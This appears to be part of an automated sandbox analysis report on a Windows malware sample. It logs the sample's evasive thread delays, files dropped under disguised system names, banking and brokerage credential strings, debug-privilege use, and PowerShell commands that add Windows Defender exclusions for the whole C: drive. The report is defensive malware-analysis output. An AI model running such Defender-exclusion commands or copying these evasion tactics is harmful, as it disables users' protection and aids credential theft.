Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 30000
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 600000
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 599562
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 598984
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 598672
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 597906
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 597078
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 596641
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 596067
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 595375
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 595062
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 3600000
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 594234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 593780
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 593234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 592891
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 592516
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 591859
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 591500
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 591156
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 590859
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 590172
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589953
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589750
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589516
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589153
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588922
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588748
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588453
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588257
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588019
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 587594
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 587391
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 587190
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 586922
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 586562
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 586348
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 585984
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 585743
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 585031
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 584708
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 584125
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 583953
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 583500
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 583371
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 582766
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 582531
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 582396
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 581172
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 579531
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 579234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 579022
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 578594
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 578247
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 578062
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 577641
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 576484
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 576234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 576086
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575939
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575793
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575685
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575566
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575395
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575237
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575122
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 574993
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 574219
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 574040
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 573725
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 573437
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 573062
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572828
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572422
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572196
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572016
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 571797
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 571453
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 571222
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 570984
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 570812
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 570547
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 569516
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568964
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568687
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568394
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568178
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568036
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 567902
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 567680
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566844
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566699
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566420
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566281
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566141
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565964
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565816
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565702
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565509
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565406
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565199
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565014
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564885
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564781
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564669
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564560
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564452
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564343
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564125
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564016
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563906
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563797
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563683
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563566
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563453
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563341
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563125
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 562002
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561887
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561780
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561672
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561562
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561438
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561328
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561157
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561047
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560934
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560817
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560703
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560585
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 559885
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 559757
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: YtBWM7vFD0.36.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: YtBWM7vFD0.36.dr Binary or memory string: discord.comVMware20,11696428655f
Source: YtBWM7vFD0.36.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: global block list test formVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2256096642.000000001B25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: YtBWM7vFD0.36.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: YtBWM7vFD0.36.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: YtBWM7vFD0.36.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: YtBWM7vFD0.36.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: YtBWM7vFD0.36.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: YtBWM7vFD0.36.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: YtBWM7vFD0.36.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: YtBWM7vFD0.36.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2260842550.000000001D87A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_
Source: YtBWM7vFD0.36.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: w32tm.exe, 00000034.00000002.2297376786.000001E2D0F19000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: YtBWM7vFD0.36.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: YtBWM7vFD0.36.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: YtBWM7vFD0.36.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: YtBWM7vFD0.36.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: YtBWM7vFD0.36.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: YtBWM7vFD0.36.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process token adjusted: Debug
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process token adjusted: Debug
Source: C:\Users\user\Downloads\smartscreen.exe Process token adjusted: Debug
Source: C:\Users\user\Downloads\smartscreen.exe Process token adjusted: Debug
Source: C:\Recovery\WmiPrvSE.exe Process token adjusted: Debug
Source: C:\Recovery\WmiPrvSE.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
